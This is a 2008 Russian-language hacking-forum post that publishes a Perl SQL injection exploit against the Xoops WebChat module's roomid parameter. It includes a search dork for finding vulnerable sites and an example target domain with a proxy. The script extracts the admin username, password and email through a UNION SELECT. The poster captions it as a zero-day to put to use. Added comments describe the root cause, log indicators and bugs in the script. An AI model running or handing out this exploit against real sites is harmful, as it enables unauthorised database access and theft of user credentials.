[Xoops WebChat Exploit]

Discussion in 'Веб-уязвимости' started by Roba, 20 Jul 2008.

  1. Roba

    Xoops WebChat

    Version: latest -- 1.60
    Dork: inurl:/modules/WebChat/ roomid​

    Code:
    #!/usr/bin/perl
    
    use LWP::UserAgent;
    use strict;
    
    # Proof-of-concept for the SQL injection in the WebChat module's `roomid`
    # parameter. Flow: read the target path and an optional proxy from the
    # command line, send a single crafted GET request, and print whatever the
    # response carries between the ":::" markers.
    #
    # Defender notes (all derived from the request built below):
    #   - Root cause, as far as this script shows: a UNION SELECT placed in
    #     `roomid` reaches the database, so the module presumably concatenates
    #     the parameter into its query without validation (module source is not
    #     shown here -- confirm). `roomid` should be handled as an integer or
    #     passed as a bound parameter.
    #   - Log indicators: requests to index.php under the WebChat module path
    #     whose `roomid` holds a negative number followed by `union+select` and
    #     a reference to `xoops_users`, sent with the fixed User-Agent
    #     "Mozilla/4.0".
    #   - Impact: uname, pass and email of the first row returned from
    #     xoops_users (`limit+0,1`) are disclosed; treat those credentials as
    #     exposed if such a request appears in the logs.

    # All script state is declared up front.
    my ($path,$proxy,$ua,$answ,$upe,$u,$p,$e);
    # $path and $proxy are declared a second time here; the new `my` masks the
    # declaration above (this would warn under `use warnings`, which the script
    # does not enable). At file scope `shift` consumes from @ARGV.
    my $path =   shift;
    my $proxy = shift;
    
    # The banner is printed unconditionally: there is no check that a path was
    # supplied and the script does not exit when it is missing.
    &usage;
    
    # NOTE(review): both arguments were already shifted off @ARGV, so $ARGV[1]
    # no longer refers to the proxy argument; these messages do not reflect
    # whether $proxy is actually set.
    if(!$ARGV[1]) {print "\n\nProxy not found :d";}
    else {print "\n\nProxy found, $ARGV[1]";}
    
    print "\n\n[~]Waiting...\n[~]Getting administrators data -- [uname, pass, email]";
    # HTTP client with a fixed User-Agent string; the proxy is applied to the
    # http scheme only, and only when a second argument was given.
    $ua=LWP::UserAgent->new;
    $ua->agent("Mozilla/4.0");
    if($proxy){
    	        $ua->proxy('http',"http://".$proxy."/");
    		  }
    # Single GET request. The `roomid` value is the injection point: the hex
    # constants 0x3A3A3A / 0x3a are ":::" and ":" and act as delimiters around
    # the uname, pass and email columns so they can be located in the response
    # body. The HTTP status is not checked; only ->content is kept.
    $answ = $ua->get("http://$path/index.php?roomid=-2222+union+select+1,unhex(hex(concat(0x3A3A3A,uname,0x3a,pass,0x3a,email,0x3A3A3A))),3,4,5+from+xoops_users+limit+0,1")->content;
    # Pull out the text between the first and last ":::" (the `.+` is greedy).
    # The match result itself is not tested; $1 is only meaningful if the match
    # succeeded.
    $answ =~m#:::(.+):::#;
    $upe = $1;
    if(!$1) {print "\nExploit failed!";}
    # Fields are split on ":"; a value that itself contains ":" would shift the
    # remaining fields.
    else { ($u,$p,$e) = split(':',$upe); print "\n\nlogin: $u\npassword: $p\nemail: $e\n"; }
    
    # Prints the banner and usage text to STDOUT.
    # Takes no arguments. It does not exit, so the caller carries on after the
    # banner even when no path was given on the command line.
    # The q{...} literal is printed verbatim, including its indentation.
    sub usage
    {
        print q
        {
         ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
                 Xoops WebChat SQL Injection Exploit (roomid)   
                    
    			  Author: ZAMUT
    			  Vuln: roomid=
    			  Homepage: http://antichat.ru
    
         Usage: exploit.pl [path] [proxy]
         Example:
         perl exploit.pl trick-click.com/exoops/modules/WebChat 62.123.110.134:8080 
         ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
        };
    
    }
    
    0day, пользуемся
     
    #1 Roba, 20 Jul 2008
    Last edited: 22 Jul 2008